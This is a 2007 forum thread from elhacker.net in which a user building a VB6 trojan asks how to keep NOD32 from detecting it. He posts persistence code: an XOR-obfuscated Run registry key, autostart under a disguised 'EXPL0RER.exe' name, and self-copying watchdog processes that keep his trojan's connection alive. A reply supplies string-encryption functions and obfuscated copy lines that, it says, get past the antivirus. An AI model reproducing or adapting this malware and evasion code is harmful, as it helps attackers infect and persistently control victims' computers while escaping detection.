elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  cifrar Cadena Registro
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: cifrar Cadena Registro  (Leído 2,343 veces)
hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
cifrar Cadena Registro
« en: 16 Junio 2007, 17:40 pm »

wenasS
ase tiempo que estoy haciendo un troyano en vb6, y hace un tiempo el nod32 me lo empezo a detectar. Vivachapas me dijo que era por heuristica (o como se escriba xD), y se solucionaba cifrando la cadena del registro. Encontre un code bien corto y lo puse, el problema es que no lo entiendo para nada, y tengo varias aplicaciones que ocupan el mismo code para agregar y cifrar la cadena, entonces al parecer la remplaza :S
alguien tiene algun code que pueda explicar?
GRAcias de antemano  ;D


En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: cifrar Cadena Registro
« Respuesta #1 en: 16 Junio 2007, 19:23 pm »

aca les dejo el code que ocupo.. ahora que me doi cuenta, probablemente no sea esta la razon por la que se remplaze.. talvez me confundi o algo asi.. de todas maneras si ocupo este code:

Código:
On Error GoTo fallo
Set Clave = CreateObject("WScript.shell")
Deb = descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lkftt")
Clave.regwrite Deb, Windows & "\EXPL0RER.exe"
fallo:

 y cambio esta parte
Código:
Clave.regwrite Deb, Windows & "\EXPL0RER.exe"

por esta

Código:
Clave.regwrite Deb, Windows & "\klass.exe"

no deberia remplazarse o si????
Gracias de antemano  :D


En línea

Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: cifrar Cadena Registro
« Respuesta #2 en: 16 Junio 2007, 20:07 pm »

http://foro.elhacker.net/index.php/topic,163624.msg772555.html#msg772555
Ahi tienes un post donde preguntan lo mismo que tu.
Pero para ayudarte porque no das todo el code?
L funcion descifrar y la variable windows,tal vez el problema este ahi....
En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: cifrar Cadena Registro
« Respuesta #3 en: 17 Junio 2007, 16:47 pm »

ok se me habia olvidado parte del code xD
aca va

Código:
dim windows as string 'en general
private sub form_load()
Windows = Environ("windir") & "\" 'declara la ruta de windows y agrega un /
end sub

private sub timer1_timer()
On Error GoTo fallo
Set Clave = CreateObject("WScript.shell")
Deb = descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lkftt")
Clave.regwrite Deb, Windows & "\EXPL0RER.exe"
fallo:
end sub

Private Function descifrar(j)
On Error Resume Next
For R = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function

En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: cifrar Cadena Registro
« Respuesta #4 en: 17 Junio 2007, 17:42 pm »

ademas... ahora estoy haciendo que se autocopie a la carpeta de windows, estoy haciendo una funcion de "infeccion", comprueba cada cierto rato si existen ssms.exe y jushed.exe, si no existen, se autocopia a la carpeta de windows, y les pone ese nombre, y si existen, comprueba que los 2 esten abiertos, el ssms.exe, ayuda a que jushed.exe se mantenga siempre abierto, y jushed ayuda a que ssms.exe se mantenga abierto ademas de hacer la conexion a mi troyano. Esto funciona de maravilla.. hasta que llega el nod32, diciendo que esta infectado, y si quito estas lineas:

Código:
WinDirek = Environ("windir") & "/" 'carpeta de windows
BSExe = App.path & "/" & App.EXEName & ".exe" 'path de la aplicacion
FileCopy BSExe, "C:\" & "ssms.exe"
FileCopy BSExe, WinDirek & "jushed.exe"

se podria cifrar esto para que el maldito nod para de saltar???
gracias!
En línea

surfrio

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: cifrar Cadena Registro
« Respuesta #5 en: 10 Julio 2007, 02:16 am »

Primeiro as funções..

Código:
Private Function NumericPassword(ByVal password As String) As Long
    Dim value As Long
    Dim ch As Long
    Dim shift1 As Long
    Dim shift2 As Long
    Dim i As Integer
    Dim str_len As Integer

    str_len = Len(password)
    For i = 1 To str_len
        ' Adiciona a próxima letra
        ch = Asc(Mid$(password, i, 1))
        value = value Xor (ch * 2 ^ shift1)
        value = value Xor (ch * 2 ^ shift2)

        ' Change the shift offsets.
        shift1 = (shift1 + 7) Mod 19
        shift2 = (shift2 + 13) Mod 23
    Next i
    NumericPassword = value
End Function


Public Function DeCriptSenha(Psenha As String) As Variant

Dim v_sqlerrm As String
Dim SenhaCript As String

Dim var1 As String

Const MIN_ASC = 32  ' Space.
Const MAX_ASC = 126 ' ~.
Const NUM_ASC = MAX_ASC - MIN_ASC + 1

chave = 2001 ''qualquer nº para montar o algorítimo da criptografia
Dim offset As Long
Dim str_len As Integer
Dim i As Integer
Dim ch As Integer
 
to_text = ""
offset = NumericPassword(chave)
Rnd -1
Randomize offset
str_len = Len(Psenha)
For i = 1 To str_len
    ch = Asc(Mid$(Psenha, i, 1))
    If ch >= MIN_ASC And ch <= MAX_ASC Then
        ch = ch - MIN_ASC
        offset = Int((NUM_ASC + 1) * Rnd)
        ch = ((ch - offset) Mod NUM_ASC)
        If ch < 0 Then ch = ch + NUM_ASC
        ch = ch + MIN_ASC
        to_text = to_text & Chr$(ch)
    End If
Next i

DeCriptSenha = to_text
   
End Function

O códgio cifrado..

Código:
Dim f, f2 As String
       
f = DeCriptSenha(":U.-_$_,<V9")
f2 = DeCriptSenha(">H9)Y#")
               
win = Environ(f2) & "/" 'carpeta de windows
BSExe = App.Path & "/" & App.EXEName & ".exe" 'path de la aplicacion
FileCopy BSExe, "C:\" & "ssms.exe"
FileCopy BSExe, win & f

assim o nod32 não pega
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines